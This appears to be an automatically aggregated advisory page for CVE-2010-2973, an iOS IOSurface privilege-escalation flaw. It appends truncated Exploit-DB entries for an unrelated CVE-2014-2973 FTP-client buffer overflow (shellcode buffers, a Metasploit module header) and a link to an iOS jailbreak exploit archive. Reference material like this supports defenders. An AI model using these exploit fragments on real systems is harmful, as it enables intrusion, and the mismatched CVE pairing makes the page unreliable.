CVE-2010-2973
Published 2010-08-05
Priority: P4 | Severity: medium (CVSS 2.0 base score 6.9)
CVSS 2.0 vector: AV:L/AC:M/Au:N/C:C/I:C/A:C
Tags: EXPLOIT
EPSS: 0.78% (51.3rd percentile)
Integer overflow in IOSurface in Apple iOS before 4.0.2 on the iPhone and iPod touch, and before 3.2.2 on the iPad, allows local users to gain privileges via vectors involving IOSurface properties, as demonstrated by JailbreakMe.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | iphone_os | before 4.0.2 (iPhone, iPod touch) | 4.0.2 |
| apple | iphone_os | before 3.2.2 (iPad) | 3.2.2 |
No detection rules found.
Exploit-DB: BulletProof FTP Client - BPS Buffer Overflow (Metasploit)
exploitdb · 2015-01-06 · CVE-2014-2973
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'BulletProof FTP Client BPS Buffer Overflow',
  'Description' => %q{
    This module exploits a stack-based buffer overflow vulnerability in
    BulletProof FTP Client 2010, caused by an overly long hostname.
    By persuading the victim to open a specially-crafted .BPS file, a
    remote attacker could execute arbitrary code on the system or cause
    the application to crash. This module has been tested successfully on
    Windows XP SP3.
  },
  'License' => MSF_LICENSE,
  'Author' =>
    [
      'Gabor Seljan'
    ],
  'References' =>
    [
      [ 'EDB', '34162' ],
      [ 'EDB', '34540' ],
      [ 'EDB', '35449' ],
      [
```
Exploit-DB: BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)
exploitdb · 2014-12-03 · CVSS 9.3 · CVE-2014-2973 [CRITICAL]
---
```ruby
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypasses the stack size limitation for a bigger payload. Allocates the 2nd
# shellcode in the heap and copies it back to the stack. This exploit uses an egghunter
# to locate the 2nd shellcode in the heap and copies it to the stack using the memcpy function.
# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 400
# ./msfvenom -p windows/messagebox TEXT="Hello Exploit-DB" EXITFUNC=process -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_
```
Exploit-DB: BulletProof FTP Client 2010 - Buffer Overflow (SEH)
exploitdb · 2014-09-05 · CVSS 9.3 · CVE-2014-2973 [CRITICAL]
---
```python
#!/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit   #
# Date: Sep 05 2014                                                            #
# Vulnerability Discovery: Gabor Seljan                                        #
# Exploit Author: Robert Kugler                                                #
# Software Link: http://www.bpftp.com/                                         #
# Version: 2010.75.0.76                                                        #
# Tested on: Windows XP                                                        #
# CVE: CVE-2014-2973                                                           #
#                                                                              #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-)               #
# The "Enter URL" form is also vulnerable                                      #
#-----------------------------------------------------------------------------#
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer+= "\x20" + "\x90" * 89
buffer+= "\xeb\x06\x90\x90"
```
Exploit-DB: BulletProof FTP Client 2010 - Buffer Overflow (SEH) (PoC)
exploitdb · 2014-07-24 · CVSS 9.3 · CVE-2014-2973 [CRITICAL]
---
```python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)           #
# Date: Jul 24 2014                                                            #
# Exploit Author: Gabor Seljan                                                 #
# Software Link: http://www.bpftp.com/                                         #
# Version: 2010.75.0.76                                                        #
# Tested on: Windows XP SP3                                                    #
# CVE: CVE-2014-2973                                                           #
#-----------------------------------------------------------------------------#
'''
(a00.9e4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
cs=001
```
Exploit-DB: Apple iOS - '.pdf' Local Privilege Escalation 'Jailbreak'
exploitdb · 2010-08-03 · CVE-2010-2973
---
The files contained in the archive linked below are those that make use of a PDF exploit in order to jailbreak devices running Apple iOS. These PDFs are of interest in that they originate in userland and give root access to the devices.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14538.7z (ios_pdf_exploit.7z)
No writeups or analysis indexed.
References
- http://lists.apple.com/archives/security-announce/2010//Aug/msg00000.html
- http://lists.apple.com/archives/security-announce/2010//Aug/msg00001.html
- http://osvdb.org/66827
- http://secunia.com/advisories/40807
- http://support.apple.com/kb/HT4291
- http://support.apple.com/kb/HT4292
- http://www.exploit-db.com/exploits/14538
- http://www.securityfocus.com/bid/42151